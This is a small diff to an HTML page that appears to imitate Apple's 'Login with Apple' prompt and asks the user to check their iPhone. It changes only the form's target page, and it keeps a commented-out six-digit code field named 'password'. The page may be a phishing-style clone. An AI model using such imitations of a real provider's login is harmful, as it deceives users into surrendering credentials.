--- a/apple2.html
+++ b/apple2.html
@@ -15,7 +15,7 @@
         <div class="shape"></div>
         <div class="shape"></div>
     </div>
-    <form action="./main.html" method="get" name="form">
+    <form action="./index.html" method="get" name="form">
         <h3>Login with Apple <i class="fab fa-apple"></i></h3>
         <label for="username">Check your Iphone</label>
         <!-- <input type="text" placeholder="Code" name="password" id="password" class="login" maxlength="6" minlength="6" required> -->
